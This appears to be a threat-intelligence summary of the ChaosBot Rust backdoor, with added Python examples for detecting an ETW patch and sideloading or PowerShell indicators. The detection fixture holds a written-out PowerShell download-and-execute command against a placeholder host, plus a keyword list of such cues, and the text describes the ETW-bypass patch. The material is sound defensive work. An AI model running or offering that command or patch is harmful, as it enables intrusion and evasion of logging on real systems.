Full Report
Cybersecurity researchers have disclosed details of a new Rust-based backdoor called ChaosBot that can allow operators to conduct reconnaissance and execute arbitrary commands on compromised hosts. "Threat actors leveraged compromised credentials that mapped to both Cisco VPN and an over-privileged Active Directory account named, 'serviceaccount,'" eSentire said in a technical report published
Analysis Summary
# Tool/Technique: ChaosBot
## Overview
ChaosBot is a newly identified, Rust-based backdoor malware capable of allowing threat actors to conduct system reconnaissance and execute arbitrary commands on compromised hosts. It is notable for using Discord channels for command and control (C2) communication.
## Technical Details
- Type: Malware family (Backdoor)
- Platform: Windows
- Capabilities: Remote command execution, system reconnaissance, C2 communication via Discord, reverse tunneling (using FRP).
- First Seen: Late September 2025 (detected by eSentire)
## MITRE ATT&CK Mapping
*Note: Mappings are based on described behavior and are inferred as the article does not explicitly list TIDs.*
- **TA0011 - Command and Control**
  - T1071 - Application Layer Protocol
  - T1071.001 - Web Protocols (Implied for Discord/HTTP traffic)
  - T1573.002 - Symmetric Cryptography (Implied for C2 communication security)
- **TA0005 - Defense Evasion**
  - T1027 - Obfuscated Files or Information (Implied by LNK/PowerShell execution)
  - T1036 - Masquerading (Sideloading DLL into legitimate binary)
  - T1055 - Process Injection (Implied by DLL Sideloading)
- **TA0003 - Persistence**
  - T1547.001 - Registry Run Keys / Startup Folder (Not explicitly mentioned, but common for backdoors)
- **TA0007 - Discovery**
  - T1082 - System Information Discovery (Stated via 'reconnaissance')
## Functionality
### Core Capabilities
- Utilizes a malicious DLL (`msedge_elf.dll`) that is sideloaded by the legitimate Microsoft Edge binary (`identity_helper.exe`).
- Establishes C2 communication exclusively through a dedicated Discord channel managed by the actor ("chaos_00019").
- Supports command execution via PowerShell (`shell`).
- File system interaction: downloading files (`download`) and uploading files (`upload`) to the C2 Discord channel.
- System monitoring via screenshot capture (`scr`).
### Advanced Features
- **Evasion Techniques:**
1. **ETW Evasion:** Patches the first few instructions of `ntdll!EtwEventWrite` (changing them to `xor eax, eax -> ret`) to bypass Event Tracing for Windows (ETW) logging.
2. **Virtual Machine Detection:** Checks system MAC addresses against known prefixes for VMware and VirtualBox, terminating execution if a match is found.
- **Network Persistence:** Downloads and deploys a Fast Reverse Proxy (FRP) tool to establish a reverse proxy connection into the victim's network, ensuring persistent access.
- **Alternative Backdoor attempt:** Unsuccessfully attempted to configure a Visual Studio Code Tunnel service for additional command execution access.
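To check for the ETW patch described above, an added example (not code from the eSentire report or from ChaosBot) that compares the in-memory prologue of `EtwEventWrite` with its on-disk copy and flags the `xor eax, eax; ret` pattern; the prologue bytes below are constructed placeholders, and on a live host they would be read from process memory and from the on-disk `ntdll.dll`.

```python
# Added example (not from the eSentire report): flag an EtwEventWrite prologue
# that has been patched to "xor eax, eax; ret", the ETW bypass the summary describes.
# Inputs are constructed byte strings; on a live host a defender would read the
# function's first bytes from process memory and from the on-disk ntdll.dll copy.

# Both common encodings of "xor eax, eax" followed by "ret" (0xC3).
XOR_EAX_RET_PATTERNS = (b"\x33\xc0\xc3", b"\x31\xc0\xc3")

def is_etw_stub_patched(in_memory: bytes, on_disk: bytes, min_len: int = 8) -> dict:
    """Compare the in-memory prologue of EtwEventWrite against its on-disk copy.

    Returns two independent findings:
      - 'pattern_hit': the memory bytes start with xor eax,eax ; ret
      - 'differs_from_disk': memory and disk prologues diverge at all
    """
    if len(in_memory) < min_len or len(on_disk) < min_len:
        raise ValueError("need at least %d prologue bytes from each source" % min_len)
    mem = in_memory[:min_len]
    disk = on_disk[:min_len]
    pattern_hit = any(mem.startswith(p) for p in XOR_EAX_RET_PATTERNS)
    first_diff = next((i for i, (a, b) in enumerate(zip(mem, disk)) if a != b), None)
    return {
        "pattern_hit": pattern_hit,
        "differs_from_disk": first_diff is not None,
        "first_diff_offset": first_diff,
        "memory_prologue": mem.hex(),
    }

# Constructed samples. The "clean" prologue is a placeholder stub, not the real
# ntdll bytes (which differ per Windows build); the comparison logic is the point.
CLEAN_PROLOGUE = bytes.fromhex("4c8bdc4883ec58b8")   # placeholder, 8 bytes
PATCHED_PROLOGUE = b"\x33\xc0\xc3" + CLEAN_PROLOGUE[3:]

if __name__ == "__main__":
    print(is_etw_stub_patched(CLEAN_PROLOGUE, CLEAN_PROLOGUE))
    print(is_etw_stub_patched(PATCHED_PROLOGUE, CLEAN_PROLOGUE))
```

The disk comparison catches patches that use a different stub than the one described here, which is why both findings are reported separately.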
## Indicators of Compromise
- File Hashes: [Not provided in the source text]
- File Names: `msedge_elf.dll` (payload DLL), `identity_helper.exe` (loader binary)
- Registry Keys: [Not provided in the source text]
- Network Indicators: C2 communication occurs over Discord channels associated with user accounts like `chaos_00019` and `lovebb0024`.
- Behavioral Indicators:
  - Execution chain starting from a malicious LNK file executing a PowerShell command.
  - Use of WMI for initial remote command execution by threat actors.
  - Process observed running `identity_helper.exe` loading `msedge_elf.dll`.
  - Deployment of FRP (Fast Reverse Proxy) software.
## Associated Threat Actors
- Unnamed threat actor using the online monikers "**chaos_00019**" and "**lovebb0024**".
- Initial access involved leveraging credentials for Cisco VPN and an over-privileged Active Directory account (`serviceaccount`).
## Detection Methods
- Signature-based detection: Signatures for the specific payload hash or FRP binaries used.
- Behavioral detection: Monitoring for:
  - PowerShell launching to download and execute code following LNK file execution.
  - Anomalous network traffic/API calls related to the `msedge_elf.dll` module.
  - Attempts to patch user-mode API functions in process memory, such as `ntdll!EtwEventWrite`.
  - MAC address checks against known VM ranges immediately preceding process termination.
- YARA rules: Could be developed based on Rust compiler signatures or specific strings/opcodes related to the hardcoded Discord interaction logic.
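The behavioral indicators above, expressed as matching logic over constructed Sysmon-style events; this is an added example, not a detection shipped by eSentire or any vendor, and the field names (`Image`, `ParentImage`, `ImageLoaded`, `CommandLine`) follow Sysmon while the events themselves are made up.

```python
# Added example (not from the eSentire report): match the behavioural indicators
# listed in this summary against constructed Sysmon-style events (EventID 1 =
# ProcessCreate, 7 = ImageLoad). Field names follow Sysmon; the events are made up.
import re

# Legitimate Edge install directory; msedge_elf.dll loaded from anywhere else is suspect.
EDGE_DIR = re.compile(r"\\microsoft\\edge\\application\\", re.I)
DOWNLOAD_CUES = ("downloadstring", "invoke-webrequest", "iex", "-enc")

def classify(event: dict) -> list:
    """Return the names of the indicators an event matches (empty list = clean)."""
    hits = []
    image = event.get("Image", "").lower()
    if event.get("EventID") == 7:
        loaded = event.get("ImageLoaded", "").lower()
        # Sideload chain: the Edge helper loading msedge_elf.dll outside the Edge install dir.
        if (image.endswith("\\identity_helper.exe") and loaded.endswith("\\msedge_elf.dll")
                and not EDGE_DIR.search(loaded)):
            hits.append("edge_sideload_msedge_elf")
    elif event.get("EventID") == 1:
        cmd = event.get("CommandLine", "").lower()
        parent = event.get("ParentImage", "").lower()
        # LNK-triggered chain: explorer.exe spawning PowerShell with download/execute cues.
        if (image.endswith("\\powershell.exe") and parent.endswith("\\explorer.exe")
                and any(cue in cmd for cue in DOWNLOAD_CUES)):
            hits.append("lnk_powershell_download_execute")
        # WMI-launched remote command: WmiPrvSE.exe as the parent of a shell.
        if parent.endswith("\\wmiprvse.exe") and image.endswith(("\\cmd.exe", "\\powershell.exe")):
            hits.append("wmi_remote_exec")
        # FRP client deployment, by binary name or command line.
        if image.endswith("\\frpc.exe") or "frpc" in cmd:
            hits.append("frp_deployment")
    return hits

# Constructed sample events (not real telemetry); record 3 is a legitimate Edge load.
SAMPLE_EVENTS = [
    {"RecordID": 1, "EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://PLACEHOLDER/p')"},
    {"RecordID": 2, "EventID": 7, "Image": r"C:\Users\Public\identity_helper.exe",
     "ImageLoaded": r"C:\Users\Public\msedge_elf.dll"},
    {"RecordID": 3, "EventID": 7, "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\identity_helper.exe",
     "ImageLoaded": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge_elf.dll"},
    {"RecordID": 4, "EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "CommandLine": "cmd.exe /c whoami"},
    {"RecordID": 5, "EventID": 1, "Image": r"C:\ProgramData\frpc.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "frpc.exe -c frpc.toml"},
]
```

Running `classify` over `SAMPLE_EVENTS` yields one indicator for records 1, 2, 4 and 5 and nothing for record 3, since a legitimate `identity_helper.exe` loads `msedge_elf.dll` from the Edge install directory.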
## Mitigation Strategies
- **Prevention:**
  - Enforcement of Multi-Factor Authentication (MFA) on privileged accounts and VPNs to prevent lateral movement following initial credential compromise.
  - Strict execution policies to control the running of code initiated via LNK files or PowerShell from untrusted sources.
- **Hardening recommendations:**
  - Implement strong host-based security monitoring focused on API hooking/patching detection (e.g., ETW bypasses).
  - Deploy endpoint detection and response (EDR) solutions capable of monitoring DLL sideloading behavior, especially involving core system binaries like Edge components.
  - Network monitoring for outbound connections to unknown or suspicious Discord endpoints if applicable, though this is complex due to legitimate Discord traffic.
## Related Tools/Techniques
- **Chaos Ransomware (Chaos-C++):** A related, but distinct, threat family mentioned in the context, noted for developing destructive (file deletion) and clipboard hijacking features, indicating potential evolution or shared threat group interest in the "Chaos" branding.
- **Fast Reverse Proxy (FRP):** A legitimate open-source utility repurposed by the actor to establish persistence and access into the internal network.
- **WMI:** Used by the threat actors to gain initial remote command execution across the network after compromising credentials.